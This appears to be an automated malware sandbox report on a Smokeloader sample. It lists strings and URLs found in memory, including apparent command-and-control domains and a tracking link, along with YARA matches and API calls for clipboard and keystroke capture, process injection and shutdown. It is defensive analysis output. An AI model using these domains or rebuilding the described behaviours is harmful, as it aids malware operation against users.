        Source: explorer.exe, 00000011.00000000.2277365932.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2869423152.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000000.2275324943.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: file.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: file.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: file.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uwgftqaxwugurgs.com/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uwgftqaxwugurgs.com/application/x-www-form-urlencodedMozilla/5.0
        Source: file.exe, 00000000.00000003.1634632525.0000000002823000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000000.1679486685.0000000000805000.00000002.00000001.01000000.00000005.sdmp, Existence.pif, 00000010.00000002.2288146522.0000000000805000.00000002.00000001.01000000.00000005.sdmp, ssjhrji, 00000013.00000002.2864587716.0000000000BA5000.00000002.00000001.01000000.00000008.sdmp, Spell.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://yyyjoidqibgvbs.net/
        Source: Existence.pif, 0000000A.00000003.2226148637.000000000144C000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000003.2226071840.0000000001435000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000002.2229992386.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965Z
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965u
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
        Source: explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
        Source: explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSE
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSN
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
        Source: explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
        Source: explorer.exe, 00000011.00000000.2272845685.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2865873250.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2273404133.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000011.00000000.2276485731.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
        Source: explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000011.00000000.2276485731.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
        Source: file.exeString found in binary or memory: https://d.symcb.com/cps0%
        Source: file.exeString found in binary or memory: https://d.symcb.com/rpa0
        Source: file.exeString found in binary or memory: https://d.symcb.com/rpa0.
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: ssjhrji.17.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
        Source: explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
        Source: file.exeString found in binary or memory: https://www.ssl.com/repository0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49734 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_007AF7C7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007AF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_007AF7C7
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B4F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00B4F7C7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007AF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_007AF55C
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079A635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_0079A635
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007C9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_007C9FD2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_007C9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_007C9FD2
        Source: C:\Users\user\AppData\Roaming\ssjhrjiCode function: 19_2_00B69FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_00B69FD2

        System Summary

        barindex
        Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0040259B NtEnumerateKey,16_2_0040259B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_004014B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_004014B0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_004014CD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_004014CD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_004014E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_004014E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_004014F3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_004014F3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_004014BB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_004014BB
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_007A4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_007A4763
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_00791B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00791B4D
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 10_2_0079F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_0079F20D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pifCode function: 16_2_0079F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_0079F20D
